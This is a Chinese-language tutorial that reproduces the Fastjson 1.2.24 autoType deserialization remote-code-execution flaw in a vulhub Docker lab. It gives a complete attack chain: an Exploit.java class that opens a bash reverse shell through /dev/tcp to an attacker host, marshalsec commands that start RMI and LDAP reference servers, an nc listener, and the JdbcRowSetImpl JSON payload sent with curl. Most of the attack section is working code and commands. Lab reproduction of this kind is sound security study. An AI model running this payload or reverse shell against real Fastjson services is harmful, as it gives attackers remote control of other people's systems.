基础了解
Fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
反序列化常用的两种利用方式,一种是基于rmi,一种是基于ldap。
RMI是一种行为,指的是Java远程方法调用。
JNDI是一个接口,在这个接口下会有多种目录系统服务的实现,通过名称等去找到相关的对象,并把它下载到客户端中来。
ldap指轻量级目录访问协议。
具体详情请参考:基于Java反序列化RCE - 搞懂RMI、JRMP、JNDI
fastjson反序列漏洞利用过程存在java版本限制:
基于rmi的利用方式:适用jdk版本:JDK 6u141, JDK 7u131, JDK 8u121之前。
在jdk8u122的时候,加入了反序列化白名单的机制,关闭了rmi远程加载代码。
基于ldap的利用方式:适用jdk版本:JDK 11.0.1、8u182、7u191、6u201之前。
在Java 8u191更新中,Oracle对LDAP向量设置了相同的限制,并发布了CVE-2018-3149,关闭了JNDI远程类加载。
可以看到ldap的利用范围是比rmi要大的,实战情况下推荐使用ldap方法进行利用。
这里给出雷震众测的一张图:
环境介绍:
主机A:attacker(119.x.x.x)
jdk版本:8u151主机B:模拟Fastjson漏洞环境(kali)
fastjson版本:1.2.24
这里我直接使用vulhub的漏洞环境,Kali自带就有docker,用docker-compose搭建一个写好的fastjson 1.2.24的环境。
启动fastjson环境:
# 启动docker服务
service docker start
# 查看已安装的镜像,获取fastjson的id
docker ps -a
# 正式启动
docker start id
用curl命令发送json数据看看环境搭是否运行
curl http://127.0.0.1:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'
利用过程
环境搭好就需要准备开始复现了,首先是写一个java文件编译为class文件,用于之后执行命令,这里准备了两个文件一个确定漏洞存在的命令(test)和一个反弹shell的(Exploit),写好后编译为class文件
将以下代码保存为Exploit.java(可以根据操作系统类型更改自己想要执行的命令)
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
//Process p = Runtime.getRuntime().exec(new String[]{"cmd","/c","calc.exe"});
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/119.x.x.x/8000;cat <&5 | while read line; do $line 2>&5 >&5; done"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
使用javac命令编译Exploit.java文件,生成一个Exploit.class文件
javac Exploit.java
把生成的Exploit.class文件,放到公网vps的web目录下,可以通过互联网的http服务访问到
在该目录使用 python 开启一个web服务
python -m SimpleHttpServer 80
访问提示可以下载即可
2、使用marshalsec启动一个RMI服务器,或者ladp服务器。
项目地址:https://github.com/mbechler/marshalsec
下载后切换到marshalsec目录下使用maven进行打包。
mvn clean package -DskipTests
打包成功后把生成的marshalsec-0.0.3-SNAPSHOT-all.jar上传到119.x.x.x
通过marshalsec启动一个RMI/LDAP服务监听的端口是8080
通过使用RMI或者LDAP的服务,将reference result 重定向到web服务器(即文件Exploit.class的存放位置)
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://119.x.x.x:80/#Exploit" 8080
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://119.x.x.x:80/#Exploit" 8080
实验环境的jdk版本为8u151,大于8u121小于8u191,理论上rmi无法使用,ldap可以使用。
3.主机A监听8000端口:
nc -lvp 8000
3.发送json数据类型的payload
在Kali上输入运行以下命令
curl http://127.0.0.1:8090/ -H "Content-Type: application/json" --data '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://119.x.x.x:8080/Exploit","autoCommit":true}}'
或者用浏览器发包:
{
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://119.x.x.x:8080/Exploit",
"autoCommit": true
}
}
注意:这里是最初版本的RCE没有加入checkAutoType()函数校验,它的主要作用是检测@type指定的类是否在白名单、黑名单。后面的许多漏洞都是对checkAutotype以及本身某些逻辑缺陷导致的漏洞进行修复,以及黑名单的不断增加。
1.2.24版本之前autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)
复现结果
ldap服务接受到了请求,在这里可以看到docker环境加载了我们vps服务器上的Exploit.class文件
成功返回数据包到vps的web服务上
Vps上的nc接收到反弹的shell
jdk版本限制绕过:
参考:Fastjson反序列化漏洞利用
后续计划:
收集不同版本的探测payload,rce payload,争取都复现一遍
参考如下
Fastjson1.2.24反序列化命令执行漏洞
fastjson1.2.47反序列化漏洞复现
Fastjson反序列化漏洞利用